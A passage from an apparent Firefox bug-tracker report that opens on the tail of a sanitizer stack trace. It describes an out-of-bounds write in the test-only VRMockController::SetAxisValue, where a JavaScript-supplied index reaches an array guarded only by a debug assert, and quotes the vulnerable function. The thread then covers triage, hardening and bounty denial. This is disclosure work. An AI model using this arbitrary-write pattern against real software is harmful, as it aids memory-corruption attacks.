    #65 0x7faf5bcd2977 in MessageLoop::Run() /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:356:3
    #66 0x7faf67429f72 in XRE_InitChildProcess(int, char**, XREChildData const*) /builds/worker/checkouts/gecko/toolkit/xre/nsEmbedFunctions.cpp:743:34
    #67 0x5620a88c0284 in content_process_main(mozilla::Bootstrap*, int, char**) /builds/worker/checkouts/gecko/browser/app/../../ipc/contentproc/plugin-container.cpp:57:28
    #68 0x5620a88c0732 in main /builds/worker/checkouts/gecko/browser/app/nsBrowserApp.cpp:359:18
    #69 0x7faf7afe4d8f in __libc_start_call_main csu/../sysdeps/nptl/libc_start_call_main.h:58:16
    #70 0x7faf7afe4e3f in __libc_start_main csu/../csu/libc-start.c:392:3
    #71 0x5620a87fed80 in _start (/home/jtjisgod/firefox/firefoxes/m-c-20221208153054-asan-opt/firefox+0x78d80) (BuildId: b6ca397ee13d76afd9504908eb9e5565317f8894)

SUMMARY: UndefinedBehaviorSanitizer: undefined-behavior /builds/worker/checkouts/gecko/dom/vr/VRServiceTest.cpp:482:3 in
[Parent 4078, IPC I/O Parent] WARNING: process 4233 exited with status 1: file /builds/worker/checkouts/gecko/ipc/chromium/src/base/process_util_posix.cc:262

Comment 1

[Taejin Jang]

Root cause

When you call setAxisValue, the first argument - 123123123- will be passed to VRMockController::SetAxisValue's aAxisIdx.
There are MOZ_ASSERT to protect that, the Macro is not working at release and nightly. (only debug mode is checking)
Type of axisValue is float[16]. So I can access arbitrary memory with aAxisIdx and I can change the memory with 'aValue'.
Which are first parameter and second parameter of ctr.setAxisValue(*aAxisIdx*, *aValue*) in javascript.
Finally I can modify any arbitrary memory, It can be a code execution vulnerability.

void VRMockController::SetAxisValue(uint32_t aAxisIdx, double aValue) {
  MOZ_ASSERT(aAxisIdx < kVRControllerMaxAxis);
  ControllerState().axisValue[aAxisIdx] = (float)aValue;
}

Comment 2

[Andrew McCreight [:mccr8]]

This and bug 1805163 are in testing-only code that requires a non-standard pref to be set, so it isn't particularly a security issue. As kind of a hardening measure, maybe we could check xpc::IsInAutomation() and fail somehow when creating a VRMockController.

Comment 3

[Andrew McCreight [:mccr8]]

It looks like Navigator::RequestVRServiceTest() might be the place to add a check. Other interfaces available via this pref, VRMockController and VRMockController, are only available to JS via the VRServiceTest WebIDL interface, so if we block one then we block them all.

Comment 4

[Andrew McCreight [:mccr8]]

I'll file a separate bug for that.

Comment 5

[Taejin Jang]

(In reply to Andrew McCreight [:mccr8] from comment #2)

This and bug 1805163 are in testing-only code that requires a non-standard pref to be set, so it isn't particularly a security issue. As kind of a hardening measure, maybe we could check xpc::IsInAutomation() and fail somehow when creating a VRMockController.

Yes, As you can see that is not critical bug.
However, I think these minor bugs should also be well managed.

Comment 6

[BugBot [:suhaib / :marco/ :calixte]]

The bug has a release status flag that shows some version of Firefox is affected, thus it will be considered confirmed.

Comment 7

[BugBot [:suhaib / :marco/ :calixte]]

The severity field is not set for this bug.
:jimm, could you have a look please?

For more information, please visit auto_nag documentation.

Comment 8

[BugBot [:suhaib / :marco/ :calixte]]

The severity field is not set for this bug.
:jimm, could you have a look please?

For more information, please visit auto_nag documentation.

Comment 9

[Chris Martin [:cmartin]]

Andrew -- Isn't this bug basically fixed by your change from Bug 1805269?

Comment 10

[Andrew McCreight [:mccr8]]

Yeah, I think that's fine. Ideally, the array here and in bug 1805163 would get turned into some kind of auto TArray with bounds checking, but I guess that's probably overkill given how unsupported this code is already.

Comment 11

[Chris Martin [:cmartin]]

Fair enough -- I'll move them to low severity, low priority.

Comment 12

[Andrew McCreight [:mccr8]]

For bug bounty purposes, we should probably just mark them fixed. If somebody feels inspired to add bounds checking, that can happen in a new bug.

Comment 13

[Daniel Veditz [:dveditz]]

Thank you for reporting this issue and bug 1805163. Unfortunately these do not qualify for our bug bounty program because they are a non-default configuration and aren't even in an opt-in feature that Firefox users will realistically search out to turn on. These bugs were in testing shims. Of course if you found a bug that let an attacker change arbitrary prefs you could enable these, but that pref-setting bug itself would be a critical bug much more valuable than these.

Comment 14

[Taejin Jang]

Thank you for your review.
As you said its bug quality is not good to get rewards.
but, Would you mind if I request CVE number?